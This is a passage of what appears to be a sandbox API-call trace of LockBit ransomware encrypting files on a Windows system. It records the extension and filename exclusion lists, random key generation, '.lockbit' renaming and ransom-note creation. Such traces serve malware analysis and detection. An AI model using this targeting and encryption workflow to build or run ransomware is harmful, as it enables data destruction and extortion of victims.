nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0102.524] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.524] malloc (_Size=0xa6) returned 0x77d800 [0102.524] NtSetInformationFile (FileHandle=0x13c4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0102.525] free (_Block=0x77d800) [0102.525] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.525] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.525] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.525] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc436f700, ftCreationTime.dwHighDateTime=0x1bd4b08, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc436f700, ftLastWriteTime.dwHighDateTime=0x1bd4b08, nFileSizeHigh=0x0, nFileSizeLow=0x1ccc, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN01545_.WMF", cAlternateFileName="")) returned 1 [0102.525] lstrcmpiW (lpString1=".", lpString2="AN01545_.WMF") returned -1 [0102.525] lstrcmpiW (lpString1="..", lpString2="AN01545_.WMF") returned -1 [0102.525] PathFindExtensionW (pszPath="AN01545_.WMF") returned=".WMF" [0102.525] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.525] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.525] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.525] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.525] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.525] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.526] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.527] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.527] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.527] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.527] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.527] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.527] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.527] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.527] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.527] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.527] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.527] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.527] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.527] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.527] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.527] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.527] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.527] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.527] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.527] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.527] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN01545_.WMF") returned 1 [0102.527] lstrcmpiW (lpString1="ntldr", lpString2="AN01545_.WMF") returned 1 [0102.527] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN01545_.WMF") returned 1 [0102.528] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN01545_.WMF") returned 1 [0102.528] lstrcmpiW (lpString1="autorun.inf", lpString2="AN01545_.WMF") returned 1 [0102.528] lstrcmpiW (lpString1="thumbs.db", lpString2="AN01545_.WMF") returned 1 [0102.528] lstrcmpiW (lpString1="iconcache.db", lpString2="AN01545_.WMF") returned 1 [0102.528] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.528] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned=".WMF" [0102.528] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.528] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.528] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.528] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.528] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.528] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.528] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.528] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.528] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.528] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.528] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.528] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.528] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.528] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.528] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.528] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.529] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.529] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.529] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.529] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.529] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.529] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.529] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.529] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.529] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.529] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.529] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.529] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.529] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.lockbit") returned 72 [0102.529] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf04 [0102.530] CreateIoCompletionPort (FileHandle=0xf04, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.530] malloc (_Size=0x40068) returned 0x3df0008 [0102.530] GetFileSizeEx (in: hFile=0xf04, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7372) returned 1 [0102.530] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.531] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0102.531] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.531] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0102.531] ReadFile (in: hFile=0xf04, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0102.540] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.540] malloc (_Size=0xa6) returned 0x77d800 [0102.540] NtSetInformationFile (FileHandle=0xf04, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0102.541] free (_Block=0x77d800) [0102.541] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.541] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.541] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.541] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37a5800, ftCreationTime.dwHighDateTime=0x1bd4af9, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe37a5800, ftLastWriteTime.dwHighDateTime=0x1bd4af9, nFileSizeHigh=0x0, nFileSizeLow=0x1d74, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN02122_.WMF", cAlternateFileName="")) returned 1 [0102.541] lstrcmpiW (lpString1=".", lpString2="AN02122_.WMF") returned -1 [0102.541] lstrcmpiW (lpString1="..", lpString2="AN02122_.WMF") returned -1 [0102.541] PathFindExtensionW (pszPath="AN02122_.WMF") returned=".WMF" [0102.541] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.541] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.541] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.541] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.541] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.541] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.541] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.541] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.541] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.541] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.541] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.542] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.542] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.543] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.543] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.543] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.543] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.543] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.543] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.543] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.543] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.543] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.543] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.543] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.543] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.543] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.543] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN02122_.WMF") returned 1 [0102.543] lstrcmpiW (lpString1="ntldr", lpString2="AN02122_.WMF") returned 1 [0102.543] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN02122_.WMF") returned 1 [0102.543] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN02122_.WMF") returned 1 [0102.543] lstrcmpiW (lpString1="autorun.inf", lpString2="AN02122_.WMF") returned 1 [0102.543] lstrcmpiW (lpString1="thumbs.db", lpString2="AN02122_.WMF") returned 1 [0102.543] lstrcmpiW (lpString1="iconcache.db", lpString2="AN02122_.WMF") returned 1 [0102.543] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.543] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned=".WMF" [0102.544] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.544] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.544] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.545] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.545] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.545] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.545] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.545] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.545] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.545] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.lockbit") returned 72 [0102.545] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c8 [0102.550] CreateIoCompletionPort (FileHandle=0x13c8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.550] malloc (_Size=0x40068) returned 0x3e30078 [0102.551] GetFileSizeEx (in: hFile=0x13c8, lpFileSize=0x3e30090 | out: lpFileSize=0x3e30090*=7540) returned 1 [0102.552] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.552] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700ac, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700ac) returned 0x0 [0102.552] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.553] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.553] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700bc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700bc) returned 0x0 [0102.553] ReadFile (in: hFile=0x13c8, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 1 [0102.566] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.566] malloc (_Size=0xa6) returned 0x77d800 [0102.566] NtSetInformationFile (FileHandle=0x13c8, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0102.567] free (_Block=0x77d800) [0102.567] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.567] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.567] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.567] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcec9bd00, ftCreationTime.dwHighDateTime=0x1bd4bea, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcec9bd00, ftLastWriteTime.dwHighDateTime=0x1bd4bea, nFileSizeHigh=0x0, nFileSizeLow=0x19e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN02559_.WMF", cAlternateFileName="")) returned 1 [0102.567] lstrcmpiW (lpString1=".", lpString2="AN02559_.WMF") returned -1 [0102.567] lstrcmpiW (lpString1="..", lpString2="AN02559_.WMF") returned -1 [0102.567] PathFindExtensionW (pszPath="AN02559_.WMF") returned=".WMF" [0102.567] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.567] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.567] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.567] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.567] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.567] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.567] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.567] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.568] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.568] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.569] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.569] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.569] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.569] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.569] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.569] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.569] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.569] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.569] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.569] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.569] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.569] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.569] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.569] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.569] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.569] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.569] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.569] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN02559_.WMF") returned 1 [0102.569] lstrcmpiW (lpString1="ntldr", lpString2="AN02559_.WMF") returned 1 [0102.569] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN02559_.WMF") returned 1 [0102.569] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN02559_.WMF") returned 1 [0102.570] lstrcmpiW (lpString1="autorun.inf", lpString2="AN02559_.WMF") returned 1 [0102.570] lstrcmpiW (lpString1="thumbs.db", lpString2="AN02559_.WMF") returned 1 [0102.570] lstrcmpiW (lpString1="iconcache.db", lpString2="AN02559_.WMF") returned 1 [0102.570] PathAddBackslashW (in: 